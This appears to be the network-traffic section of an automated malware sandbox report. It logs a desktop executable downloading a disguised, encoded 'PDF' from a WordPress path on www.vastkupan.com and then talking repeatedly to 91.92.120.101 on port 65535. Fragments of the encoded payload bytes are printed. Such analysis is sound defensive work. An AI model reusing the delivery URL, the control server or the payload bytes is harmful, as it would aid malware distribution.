Jun 19, 2025 12:59:11.507585049 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.507652044 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.507657051 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.507719994 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.508034945 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.508235931 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:11.510957956 CEST	443	49702	142.251.40.225	192.168.2.6
Jun 19, 2025 12:59:11.553782940 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:24.010056019 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.010099888 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.010185003 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.010631084 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.010637999 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.422981977 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.423053026 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.426148891 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.426160097 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.426848888 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.431709051 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.431771040 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.431781054 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.432529926 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.432670116 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.433474064 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.476793051 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.568164110 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.617441893 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.698426962 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698440075 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698472023 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698487043 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698498011 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698503971 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.698518991 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698532104 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698540926 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698544025 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.698548079 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698558092 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698596954 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.698622942 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.698671103 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.700402975 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.700474024 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.749001980 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:24.749627113 CEST	443	49715	172.202.163.200	192.168.2.6
Jun 19, 2025 12:59:24.749692917 CEST	49715	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:59:40.382088900 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:59:40.382112026 CEST	443	49701	142.250.80.100	192.168.2.6
Jun 19, 2025 12:59:41.845138073 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:59:41.845164061 CEST	443	49707	142.250.80.78	192.168.2.6
Jun 19, 2025 12:59:42.631979942 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:59:42.631997108 CEST	443	49709	142.250.80.78	192.168.2.6
Jun 19, 2025 12:59:42.975779057 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:59:42.975809097 CEST	443	49710	142.250.80.78	192.168.2.6
Jun 19, 2025 12:59:43.448724985 CEST	49707	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:59:43.448785067 CEST	49701	443	192.168.2.6	142.250.80.100
Jun 19, 2025 12:59:43.720458031 CEST	49702	443	192.168.2.6	142.251.40.225
Jun 19, 2025 12:59:43.720573902 CEST	49709	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:59:43.720710993 CEST	49710	443	192.168.2.6	142.250.80.78
Jun 19, 2025 12:59:44.284128904 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:44.482542038 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:44.483293056 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:44.495280027 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:44.695960999 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:44.741430044 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:44.952876091 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:44.952958107 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:45.151086092 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.151251078 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:45.152192116 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.152271986 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:45.349303961 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.349342108 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.349497080 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:45.349581003 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.349659920 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:45.349893093 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.349932909 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:45.350081921 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.350130081 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:45.547944069 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.548012972 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.548091888 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:45.548136950 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.548186064 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:45.549093008 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:45.747061968 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:46.086597919 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:46.326914072 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:46.326986074 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:46.565821886 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:46.710453987 CEST	49691	80	192.168.2.6	172.217.165.131
Jun 19, 2025 12:59:46.796206951 CEST	80	49691	172.217.165.131	192.168.2.6
Jun 19, 2025 12:59:46.796284914 CEST	49691	80	192.168.2.6	172.217.165.131
Jun 19, 2025 12:59:47.339027882 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:47.339274883 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:47.340688944 CEST	49716	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:47.538738966 CEST	65535	49716	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:49.383012056 CEST	49717	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:49.582117081 CEST	65535	49717	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:49.582300901 CEST	49717	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:49.582449913 CEST	49717	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:49.784296989 CEST	65535	49717	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:49.835437059 CEST	49717	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:49.993343115 CEST	49717	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:50.233838081 CEST	65535	49717	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:50.233913898 CEST	49717	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:50.437093019 CEST	65535	49717	91.92.120.101	192.168.2.6
Jun 19, 2025 12:59:50.437278032 CEST	49717	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:50.440032005 CEST	49717	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:59:50.640260935 CEST	65535	49717	91.92.120.101	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 19, 2025 12:58:32.959570885 CEST	57425	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:33.320677996 CEST	53	57425	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:54.472385883 CEST	53	61704	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:54.601772070 CEST	63538	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:54.601907015 CEST	59896	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:54.686635971 CEST	53	54562	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:54.687868118 CEST	53	63538	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:54.687875032 CEST	53	59896	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:55.184633970 CEST	61323	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:55.184796095 CEST	63917	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:55.270430088 CEST	53	61323	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:55.271332026 CEST	53	63917	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:55.624165058 CEST	53	55276	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:56.229111910 CEST	57346	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:56.229337931 CEST	63099	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:56.249373913 CEST	60185	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:56.249563932 CEST	58161	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:56.315140009 CEST	53	57346	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:56.315681934 CEST	53	63099	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:56.335504055 CEST	53	60185	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:56.338793039 CEST	53	58161	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:56.430121899 CEST	53	57795	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:57.232131958 CEST	53313	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:57.232310057 CEST	64536	53	192.168.2.6	1.1.1.1
Jun 19, 2025 12:58:57.318137884 CEST	53	53313	1.1.1.1	192.168.2.6
Jun 19, 2025 12:58:57.318483114 CEST	53	64536	1.1.1.1	192.168.2.6
Jun 19, 2025 12:59:02.184853077 CEST	53	52043	1.1.1.1	192.168.2.6
Jun 19, 2025 12:59:02.186542988 CEST	53	65421	1.1.1.1	192.168.2.6
Jun 19, 2025 12:59:03.785499096 CEST	53	60811	1.1.1.1	192.168.2.6
Jun 19, 2025 12:59:13.487207890 CEST	53	57872	1.1.1.1	192.168.2.6
Jun 19, 2025 12:59:32.456120968 CEST	53	63805	1.1.1.1	192.168.2.6
Jun 19, 2025 12:59:35.122451067 CEST	138	138	192.168.2.6	192.168.2.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 19, 2025 12:58:32.959570885 CEST	192.168.2.6	1.1.1.1	0xcbcc	Standard query (0)	www.vastkupan.com	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:54.601772070 CEST	192.168.2.6	1.1.1.1	0x1648	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:54.601907015 CEST	192.168.2.6	1.1.1.1	0x292f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jun 19, 2025 12:58:55.184633970 CEST	192.168.2.6	1.1.1.1	0x1d91	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:55.184796095 CEST	192.168.2.6	1.1.1.1	0xfc87	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Jun 19, 2025 12:58:56.229111910 CEST	192.168.2.6	1.1.1.1	0xefaa	Standard query (0)	ogads-pa.clients6.google.com	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:56.229337931 CEST	192.168.2.6	1.1.1.1	0x5470	Standard query (0)	ogads-pa.clients6.google.com	65	IN (0x0001)	false
Jun 19, 2025 12:58:56.249373913 CEST	192.168.2.6	1.1.1.1	0xf8a2	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:56.249563932 CEST	192.168.2.6	1.1.1.1	0xeac3	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Jun 19, 2025 12:58:57.232131958 CEST	192.168.2.6	1.1.1.1	0xa4f5	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:57.232310057 CEST	192.168.2.6	1.1.1.1	0x7d98	Standard query (0)	play.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 19, 2025 12:58:33.320677996 CEST	1.1.1.1	192.168.2.6	0xcbcc	No error (0)	www.vastkupan.com		185.15.121.100	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:54.687868118 CEST	1.1.1.1	192.168.2.6	0x1648	No error (0)	www.google.com		142.250.80.100	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:54.687875032 CEST	1.1.1.1	192.168.2.6	0x292f	No error (0)	www.google.com			65	IN (0x0001)	false
Jun 19, 2025 12:58:55.270430088 CEST	1.1.1.1	192.168.2.6	0x1d91	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 19, 2025 12:58:55.270430088 CEST	1.1.1.1	192.168.2.6	0x1d91	No error (0)	googlehosted.l.googleusercontent.com		142.251.40.225	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:55.271332026 CEST	1.1.1.1	192.168.2.6	0xfc87	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 19, 2025 12:58:56.315140009 CEST	1.1.1.1	192.168.2.6	0xefaa	No error (0)	ogads-pa.clients6.google.com		142.250.176.202	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:56.335504055 CEST	1.1.1.1	192.168.2.6	0xf8a2	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 19, 2025 12:58:56.335504055 CEST	1.1.1.1	192.168.2.6	0xf8a2	No error (0)	plus.l.google.com		142.250.80.78	A (IP address)	IN (0x0001)	false
Jun 19, 2025 12:58:56.338793039 CEST	1.1.1.1	192.168.2.6	0xeac3	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 19, 2025 12:58:57.318137884 CEST	1.1.1.1	192.168.2.6	0xa4f5	No error (0)	play.google.com		142.250.80.78	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.vastkupan.com

slscr.update.microsoft.com

www.google.com

clients2.googleusercontent.com

apis.google.com

play.google.com

c.pki.goog

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49691	172.217.165.131	80

Timestamp	Bytes transferred	Direction	Data
Jun 19, 2025 12:58:46.502032042 CEST	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Jun 19, 2025 12:58:46.588371038 CEST	1242	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="cacerts" Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]} Content-Length: 530 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 19 Jun 2025 10:50:40 GMT Expires: Thu, 19 Jun 2025 11:40:40 GMT Cache-Control: public, max-age=3000 Age: 486 Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT Content-Type: application/pkix-crl Vary: Accept-Encoding Data Raw: 30 82 02 0e 30 82 01 93 02 01 01 30 0a 06 08 2a 86 48 ce 3d 04 03 03 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 34 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 17 0d 32 36 30 32 32 38 30 37 35 39 35 39 5a 30 81 e9 30 2f 02 10 6e 47 a9 ce 4f 46 c2 3d e2 49 ea cc 38 94 53 73 17 0d 31 39 30 39 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 f0 9c 5b 70 05 a6 dc 86 e2 f9 9e f3 17 0d 32 30 30 31 33 31 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 fe a5 81 44 7e 3b fd 3b b8 1c 24 98 17 0d 32 33 30 36 31 33 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 16 68 25 e1 70 04 40 61 24 91 f5 40 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 00 8e b2 58 e7 b5 94 0c 1f f9 00 44 17 0d 32 35 30 [TRUNCATED] Data Ascii: 000H=0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R4250403080000Z260228075959Z00/nGOF=I8Ss190930000000Z00U0,[p200131000000Z00U0,D~;;$230613000000Z00U0,h%p@a$@250403080000Z00U0,XD250403080000Z00U/0-0U0U#0LtI6>j0H=i0f1>2en:IN@g=;bQZ~`NX1?^4y[$\4{;$zDeU6O

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49685	185.15.121.100	443	6716	C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe

Timestamp	Bytes transferred	Direction	Data
2025-06-19 10:58:33 UTC	94	OUT	GET /wp-admin/js/Daupinslenj.pdf HTTP/1.1 Host: www.vastkupan.com Connection: Keep-Alive
2025-06-19 10:58:34 UTC	275	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 3487232 Content-Type: application/pdf Date: Thu, 19 Jun 2025 10:58:33 GMT Etag: "353600-68539e6b-65f60b6ed65d68d6;;;" Last-Modified: Thu, 19 Jun 2025 05:21:47 GMT Server: LiteSpeed X-Turbo-Charged-By: LiteSpeed
2025-06-19 10:58:34 UTC	1460	IN	Data Raw: 7a 6b a1 37 32 31 37 31 35 37 31 31 c8 ce 31 37 89 31 37 31 31 37 31 31 77 31 31 37 31 31 37 31 31 37 31 31 37 31 31 37 31 31 37 31 31 37 31 31 37 31 31 37 31 31 37 31 31 37 31 31 b7 31 31 37 3f 2e 8d 3f 31 83 38 fc 16 89 30 7b fc 10 63 59 58 44 11 41 45 5e 56 45 50 5c 17 52 50 59 5f 5e 43 11 53 52 11 43 42 5f 11 5e 5f 11 73 7e 62 17 5c 5e 53 54 1f 3a 3c 3b 13 31 31 37 31 31 37 31 61 72 31 31 7b 30 32 37 75 af 64 59 31 37 31 31 37 31 31 37 d1 31 39 10 3a 36 01 31 37 1f 04 37 31 37 37 31 31 37 31 31 49 7c 04 37 31 11 37 31 31 57 04 31 37 31 71 37 31 11 37 31 31 35 31 31 33 31 31 37 31 31 37 31 35 37 31 31 37 31 31 37 31 91 02 31 31 35 31 31 37 31 31 37 32 31 77 b4 31 37 21 31 37 21 31 37 31 31 27 31 31 27 31 31 37 31 31 37 3e 31 37 31 31 37 31 31 37 31 31 Data Ascii: zk721715711171711711w11711711711711711711711711711711711117?.?180{cYXDAE^VEP\RPY_^CSRCB_^_s~b\^ST:<;1171171ar11{027udY1711711719:617717711711I\|71711W171q717115113117117157117117111511711721w17!17!1711'11'117117>1711711711
2025-06-19 10:58:34 UTC	1460	IN	Data Raw: 32 07 39 31 33 31 31 37 31 31 37 31 31 37 26 1b 76 2d 31 37 31 31 37 31 b0 37 31 31 a3 32 31 37 24 35 37 31 08 37 31 31 29 31 31 36 32 01 3f 31 35 37 31 31 37 31 31 37 31 31 20 1b 70 2b 31 31 37 31 31 37 b0 31 37 31 bc 36 31 31 39 33 31 37 08 31 37 31 2f 37 31 30 24 01 35 37 35 31 37 31 31 37 31 31 37 31 26 1d 22 01 34 31 35 37 31 31 37 31 31 37 31 31 37 1b 32 07 39 31 33 31 31 37 31 31 37 31 31 37 26 1b 76 05 31 37 33 31 37 31 40 36 31 31 04 30 31 37 95 33 37 31 4d 37 31 31 37 31 31 37 31 31 37 31 2b 36 31 31 1c 33 31 37 74 32 37 31 0b 37 31 31 18 31 31 36 22 01 34 31 35 37 31 31 37 31 31 37 31 31 37 1b 22 07 32 31 b7 31 31 37 30 31 37 20 19 db 22 31 31 11 33 37 31 31 c9 3f 31 37 09 31 37 31 31 c9 3d 31 37 74 32 37 31 31 32 31 31 37 37 31 37 31 1e 37 31 Data Ascii: 2913117117117&v-171171711217$571711)1162?15711711711 p+1171171716119317171/710$575171171171&"41571171171172913117117117&v173171@611017371M71171171171+611317t271711116"4157117117117"21117017 "113711?171711=17t27112117717171
2025-06-19 10:58:34 UTC	1460	IN	Data Raw: 31 31 37 09 a6 c8 ce ce 25 31 31 20 1b 31 37 31 23 37 31 25 1d 31 31 37 5b 19 db 22 31 31 4f 2c 3f 31 35 1f 2e 29 37 37 4f 29 39 31 33 19 12 2f 31 37 1d 31 5b 1f dd 22 37 37 4f 2a 39 31 33 19 2e 2f 31 37 49 2f 39 37 35 19 14 29 31 31 1b 31 5d 19 dd 24 31 37 49 2c 39 37 35 19 28 29 31 31 4f 2f 3f 31 35 1f 12 29 37 37 1b 37 5b 19 db 22 31 31 4f 2c 3f 31 35 1f 2e 29 37 37 4f 29 39 31 33 19 12 2f 31 37 1d 31 5b 1f dd 22 37 37 4f 2a 39 31 33 19 2e 2f 31 37 49 2f 39 37 35 19 14 29 31 31 1b 31 5d 19 dd 24 31 37 49 2c 39 37 35 19 28 29 31 31 4f 2f 3f 31 35 1f 12 29 37 37 1b 37 5b 19 db 22 31 31 4f 2c 3f 31 35 1f 2e 29 37 37 4f 29 39 31 33 19 12 2f 31 37 1d 31 5b 1f dd 22 37 37 4f 2a 39 31 33 19 2e 2f 31 37 49 2f 39 37 35 19 14 29 31 31 1b 31 5d 19 dd 24 31 37 49 Data Ascii: 117%11 171#71%117["11O,?15.)77O)913/171["77O913./17I/975)111]$17I,975()11O/?15)777["11O,?15.)77O)913/171["77O913./17I/975)111]$17I,975()11O/?15)777["11O,?15.)77O)913/171["77O*913./17I/975)111]$17I
2025-06-19 10:58:34 UTC	1460	IN	Data Raw: 33 31 31 37 31 31 37 31 31 37 31 1b 24 01 35 37 35 31 37 31 31 37 31 31 37 31 25 1d 22 01 34 31 35 37 31 31 37 31 31 37 31 31 23 1b 22 07 32 31 33 31 31 37 31 31 37 31 31 37 31 1b 24 01 34 37 35 31 37 31 31 37 31 31 37 31 25 1d 22 01 34 31 b1 37 31 31 36 31 31 26 19 dd 24 31 37 17 33 31 37 31 cf 39 31 31 0f 31 31 37 31 cf 3b 31 31 72 32 31 37 31 66 37 31 31 32 31 31 37 1f 31 37 31 09 65 31 31 37 4f 2f 3f 31 35 1f 12 29 37 37 11 37 31 31 37 4f f6 30 31 35 4c f1 36 37 35 08 fb ce ce c8 17 11 37 31 31 37 09 f0 c8 ce ce 49 2c 39 37 35 19 28 29 31 31 11 30 37 31 31 49 f6 36 37 35 4a ef 36 31 33 0b 92 c8 ce ce 11 11 30 37 31 31 0f a9 ce c8 ce 1b 25 31 31 20 1b 31 37 31 23 37 31 25 1d 31 31 37 23 31 37 25 1b 37 31 31 24 01 32 37 35 31 37 31 31 37 31 31 37 31 31 Data Ascii: 31171171171$575171171171%"415711711711#"2131171171171$475171171171%"41711611&$1731719111171;11r2171f7112117171e117O/?15)777117O015L6757117I,975()110711I675J6130711%11 171#71%117#17%711$2751711711711
2025-06-19 10:58:34 UTC	1460	IN	Data Raw: 35 37 31 31 37 31 31 37 31 31 37 1b 22 07 32 31 33 31 31 37 31 31 37 31 31 37 31 1b 24 01 32 37 b1 31 37 31 30 37 31 20 1f dd 22 37 37 11 35 31 31 37 cf 3f 37 31 09 37 31 31 37 cf 3d 37 31 74 34 31 31 37 34 31 37 31 1e 37 31 31 31 31 31 37 09 31 37 31 31 1d 4f 2c 3f 31 35 1f 2e 29 37 37 11 37 31 31 37 4f f6 30 31 35 4c dc 36 37 35 08 fc ce ce c8 17 11 36 31 31 37 09 f1 c8 ce ce 49 2f 39 37 35 19 14 29 31 31 11 31 37 31 31 49 f6 36 37 35 4a d5 36 31 33 0b 93 c8 ce ce 11 11 31 37 31 31 0f a6 ce c8 ce 23 37 31 26 1d 31 31 37 23 31 37 25 1b 37 31 31 15 31 25 92 7a 31 37 33 1b 37 31 31 24 01 32 37 35 31 37 31 31 37 31 31 37 31 31 1d 23 31 37 25 1b 37 31 31 24 01 32 37 35 31 37 31 31 37 31 31 37 31 31 1d 23 31 37 25 1b 37 31 31 24 01 32 37 35 31 37 31 31 37 31 Data Ascii: 57117117117"2131171171171$27171071 "775117?717117=71t4117417171111171711O,?15.)777117O015L6756117I/975)111711I675J6131711#71&117#17%7111%z173711$2751711711711#17%711$2751711711711#17%711$275171171
2025-06-19 10:58:34 UTC	617	IN	Data Raw: 09 31 37 31 31 1d 4f 2c 3f 31 35 1f 2e 29 37 37 11 37 31 31 37 4f f6 30 31 35 4c 24 39 37 35 08 fc ce ce c8 17 11 36 31 31 37 09 f1 c8 ce ce 49 2f 39 37 35 19 14 29 31 31 11 31 37 31 31 49 f6 36 37 35 4a e7 36 31 33 0b 93 c8 ce ce 11 11 31 37 31 31 0f a6 ce c8 ce 23 37 31 26 1d 31 31 37 23 31 37 25 1b 37 31 31 24 01 34 37 35 31 37 31 31 37 31 31 37 31 31 1d 22 01 34 31 35 37 31 31 37 31 31 37 31 31 37 1b 22 07 32 31 b7 31 31 37 30 31 37 20 19 db 22 31 31 11 33 37 31 31 c9 3f 31 37 09 31 37 31 31 c9 3d 31 37 74 32 37 31 31 60 31 31 37 1f 31 37 31 34 37 31 31 0f 63 31 37 31 4f 2a 39 31 33 19 2e 2f 31 37 17 30 31 37 31 4f f0 36 31 33 4a f0 30 31 35 0d fd ce c8 ce 17 17 30 31 37 31 09 f6 ce ce c8 4f 2f 3f 31 35 1f 12 29 37 37 11 37 31 31 37 4f f6 30 31 35 4c Data Ascii: 1711O,?15.)777117O015L$9756117I/975)111711I675J6131711#71&117#17%711$4751711711711"4157117117117"21117017 "113711?171711=17t2711`1171714711c171O*913./170171O613J0150171O/?15)777117O015L
